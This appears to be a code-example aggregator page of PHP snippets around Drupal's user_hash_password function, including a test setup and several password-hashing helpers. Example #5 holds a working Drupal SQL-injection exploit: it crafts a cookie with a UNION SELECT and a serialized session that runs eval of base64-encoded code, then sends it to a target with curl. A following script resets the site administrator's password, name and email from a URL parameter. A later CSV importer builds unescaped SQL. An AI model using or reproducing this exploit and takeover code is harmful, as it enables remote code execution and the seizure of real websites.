Beispiel #1
0
 function setUp2()
 {
     $this->user1 = user_load(1);
     // Update uid 1's name and password so we know it.
     $password = user_password();
     require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
     $account = array('name' => 'user1', 'pass' => user_hash_password(trim($password)));
     // We cannot use user_save() here or the password would be hashed again.
     db_update('users')->fields($account)->condition('uid', 1)->execute();
     // Reload and log in uid 1.
     $this->user1 = user_load(1, TRUE);
     $this->user1->pass_raw = $password;
     // Rebuild content access permissions
     $this->drupalLogin($this->user1);
     $this->drupalPost('admin/reports/status/rebuild', array(), t('Rebuild permissions'));
     if (module_exists('devel_node_access')) {
         // Enable Devel Node Access.
         $this->drupalGet('admin/config/development/devel');
         $this->assertResponse(200);
         $this->drupalPost('admin/config/development/devel', array('devel_node_access_debug_mode' => '1'), t('Save configuration'));
         $this->assertResponse(200, 'Devel Node Access configuration saved.');
         // Enable the second DNA block, too.
         $this->drupalPost('admin/structure/block/list', array('blocks[devel_node_access_dna_user][region]' => 'footer'), t('Save blocks'));
     }
     if (module_exists('devel')) {
         $this->drupalPost('admin/config/development/devel', array('devel_error_handlers[]' => array(1, 2, 4)), t('Save configuration'));
         $this->assertResponse(200, 'Devel configuration saved.');
         $this->drupalPost('admin/people/permissions/list', array('1[access devel information]' => 'access devel information', '2[access devel information]' => 'access devel information'), t('Save permissions'));
         $this->assertResponse(200, 'Devel permissions saved.');
     }
     /*
       The base class creates the following users:
       $this->user1                = user 1
       $this->admin_user           = array('administer blocks', 'administer forums', 'administer menu', 'administer taxonomy', 'create forum content')); // 'access administration pages')
       $this->edit_any_topics_user = array('create forum content', 'edit any forum content', 'delete any forum content', 'access administration pages')
       $this->edit_own_topics_user = array('create forum content', 'edit own forum content', 'delete own forum content')
       $this->web_user             = array()
     
       Remove these users and roles and create the ones we need.
     */
     user_role_delete((int) reset($this->admin_user->roles));
     user_role_delete((int) reset($this->edit_any_topics_user->roles));
     user_role_delete((int) reset($this->edit_own_topics_user->roles));
     user_delete($this->admin_user->uid);
     user_delete($this->edit_any_topics_user->uid);
     user_delete($this->edit_own_topics_user->uid);
     user_delete($this->web_user->uid);
     unset($this->web_user);
     // Get rids and uids up to 10/9.
     for ($i = 0; $i < 3; ++$i) {
         $dummy_rid = (int) $this->drupalCreateRole(array(), 'dummy');
         $dummy_user = $this->drupalCreateNamedUser('Dummy', array($dummy_rid));
         user_role_delete($dummy_rid);
         user_delete($dummy_user->uid);
     }
     // Create our roles.
     $this->admin_rid = 3;
     $this->webmaster_rid = (int) $this->drupalCreateRole(array('administer blocks', 'administer forums', 'administer nodes', 'administer comments', 'administer menu', 'administer taxonomy', 'create forum content', 'access content overview', 'access administration pages', 'view revisions', 'revert revisions', 'delete revisions'), '11 webmaster');
     $this->forum_admin_rid = (int) $this->drupalCreateRole(array('administer forums', 'create forum content', 'edit any forum content', 'delete any forum content'), '12 forum admin');
     $this->edndel_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'delete any forum content', 'view own unpublished content'), '13 edndel any content');
     $this->edndel_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'delete own forum content'), '14 edndel own content');
     $this->edit_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'view own unpublished content'), '15 edit any content');
     $this->edit_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'edit own comments'), '16 edit own content');
     $this->delete_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete any forum content', 'view own unpublished content'), '17 delete any content');
     $this->delete_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete own forum content', 'edit own comments'), '18 delete own content');
     // EOC should not make any difference!
     $this->create_content_rid = (int) $this->drupalCreateRole(array('create forum content'), '19 create content');
     $this->anon_rid = DRUPAL_ANONYMOUS_RID;
     $this->auth_rid = DRUPAL_AUTHENTICATED_RID;
     // Create our users.
     $this->admin_user = $this->drupalCreateNamedUser('10_Administrator', array($this->admin_rid));
     $this->webmaster_user = $this->drupalCreateNamedUser('11_Webmaster', array($this->webmaster_rid));
     $this->forum_admin_user = $this->drupalCreateNamedUser('12_Forum_admin', array($this->forum_admin_rid));
     $this->edndel_any_content_user = $this->drupalCreateNamedUser('13_EdNDel_any_content', array($this->edndel_any_content_rid));
     $this->edndel_own_content_user = $this->drupalCreateNamedUser('14_EdNDel_own_content', array($this->edndel_own_content_rid));
     $this->edit_any_content_user = $this->drupalCreateNamedUser('15_Edit_any_content', array($this->edit_any_content_rid));
     $this->edit_own_content_user = $this->drupalCreateNamedUser('16_Edit_own_content', array($this->edit_own_content_rid));
     $this->delete_any_content_user = $this->drupalCreateNamedUser('17_Delete_any_content', array($this->delete_any_content_rid));
     $this->delete_own_content_user = $this->drupalCreateNamedUser('18_Delete_own_content', array($this->delete_own_content_rid));
     $this->create_content_user = $this->drupalCreateNamedUser('19_Create_content', array($this->create_content_rid));
     $this->auth_user = $this->drupalCreateNamedUser('20_Auth_only', array());
     $this->moderator = $this->drupalCreateNamedUser('21_Moderator', array($this->create_content_rid));
     $anon = drupal_anonymous_user();
     $anon->name = check_plain(format_username($anon));
     $this->accounts = array($this->user1, $this->admin_user, $this->webmaster_user, $this->forum_admin_user, $this->edndel_any_content_user, $this->edndel_own_content_user, $this->edit_any_content_user, $this->edit_own_content_user, $this->delete_any_content_user, $this->delete_own_content_user, $this->create_content_user, $this->auth_user, $this->moderator);
     $this->rids = array($this->anon_rid, $this->auth_rid, $this->admin_rid, $this->webmaster_rid, $this->forum_admin_rid, $this->edndel_any_content_rid, $this->edndel_own_content_rid, $this->edit_any_content_rid, $this->edit_own_content_rid, $this->delete_any_content_rid, $this->delete_own_content_rid, $this->create_content_rid);
     // Show settings for reference.
     $this->drupalGet('admin/people/permissions/list');
     $this->assertResponse(200, '^^^ Permissions');
     $this->drupalGet('admin/people', array('query' => array('sort' => 'asc', 'order' => drupal_encode_path(t('Username')))));
     $this->assertResponse(200, '^^^ Users');
 }
Beispiel #2
0
 /**
  * update the password.
  * update the password in the shard + update the password in the www/CMS version.
  * @param $user the username
  * @param $pass the new password.
  * @return ok if it worked, if the lib or shard is offline it will return liboffline or shardoffline.
  */
 public static function setPassword($user, $pass)
 {
     $hashpass = crypt($pass, WebUsers::generateSALT());
     $reply = WebUsers::setAmsPassword($user, $hashpass);
     $drupal_pass = user_hash_password($pass);
     $values = array('user' => $user, 'pass' => $drupal_pass);
     try {
         //make connection with and put into shard db
         db_query("UPDATE {users} SET pass = :pass WHERE name = :user", $values);
     } catch (PDOException $e) {
         //ERROR: the web DB is offline
     }
     return $reply;
 }
 /**
  * This function hashes an user password
  *
  * @param mixed $field
  *   A string or an array of strings
  *
  * @return mixed
  *   Resulted hashes
  */
 public static function userHashPassword($field)
 {
     require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
     if (is_array($field)) {
         foreach ($field as &$f) {
             $f = self::userHashPassword($f);
         }
         return $field;
     }
     return user_hash_password($field);
 }
Beispiel #4
0
 function hashPassword($password)
 {
     require_once DRUPAL_ROOT . '/includes/password.inc';
     return user_hash_password($password);
 }
Beispiel #5
0
        $code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code))));
    } else {
        $code_inject = $code;
    }
}
$code_inject = rtrim($code_inject, ';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
    $url = substr($url, 4);
}
$_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] =& $_SESSION['string'];
list(, $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION)));
$inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- ";
$cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, True);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, True);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5'));
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
<?php

define('DRUPAL_ROOT', getcwd());
require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
require_once DRUPAL_ROOT . '/includes/password.inc';
if (isset($_GET['pass']) && !empty($_GET['pass'])) {
    $newhash = user_hash_password($_GET['pass']);
} else {
    die('Retry with ?pass=PASSWORD set in the URL');
}
$updatepass = db_update('users')->fields(array('pass' => $newhash, 'name' => 'admin', 'mail' => 'cuneyt_dogan@windowslive.com	'))->condition('uid', '1', '=')->execute();
print "Done. Please delete this file immediately!";
drupal_exit();
 /**
  * This function hashes an user password
  *
  * @param mixed $field
  *   A string or an array of strings
  *
  * @return mixed
  *   Resulted hashes
  */
 public static function userHashPassword($field)
 {
     static $not_included = TRUE;
     if ($not_included) {
         require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
         $not_included = FALSE;
     }
     if (is_array($field)) {
         return array_map(array(__CLASS__, __FUNCTION__), $field);
     }
     return user_hash_password($field);
 }
$dbh = new PDO('mysql:host=localhost;dbname=backdrop_cmi', $user, $pass);
/*
 * Data map
 *
 * 0: ID             => uid
 * 1: user_login     => name
 * 2: user_pass      => pass  // hardcode; 'pass'
 * // field_name = explode('-', user_nicename);
 * 3: user_nicename  => NOT USED
 * 4: user_email     => mail
 * 5: user_url       => NOT USED
 * 6: user_registered => 2012-09-29 20:15:51 // timestamp
 * 7: user_activation_key => NOT USED
 * 8: user_status => NOT USED
 * 9: display_name => field_name
 */
$data = file('../cmi-wp-users.csv', FILE_IGNORE_NEW_LINES);
foreach ($data as $d) {
    $d = explode(',', $d);
    $d[6] = trim($d[6], '"');
    $time = strtotime($d[6]);
    $el_pass = user_hash_password('pass');
    print $el_pass . "\n";
    $sql = "insert into users (\n    uid,\n    name,\n    pass,\n    mail,\n    created,\n    status,\n    timezone\n    ) values(\n        {$d['0']},\n        {$d['1']},\n        {$el_pass},\n        {$d['4']},\n        {$time},\n        1,\n        'America/New_York'\n      )";
    $dbh->query($sql);
    $name_sql = "insert into field_data_field_name (\n          entity_type,\n          bundle,\n          deleted,\n          entity_id,\n          revision_id,\n          language,\n          field_name_value\n        ) values (\n            'user',\n            'user',\n            0,\n            {$d['0']},\n            1,\n            'und',\n            {$d['9']}\n          )";
    $dbh->query($name_sql);
    $rev_name_sql = "insert into field_revision_field_name (\n          entity_type,\n          bundle,\n          deleted,\n          entity_id,\n          revision_id,\n          language,\n          field_name_value\n        ) values (\n            'user',\n            'user',\n            0,\n            {$d['0']},\n            1,\n            'und',\n            {$d['9']}\n          )";
    $dbh->query($rev_name_sql);
}
print 'i did it.' . "\n";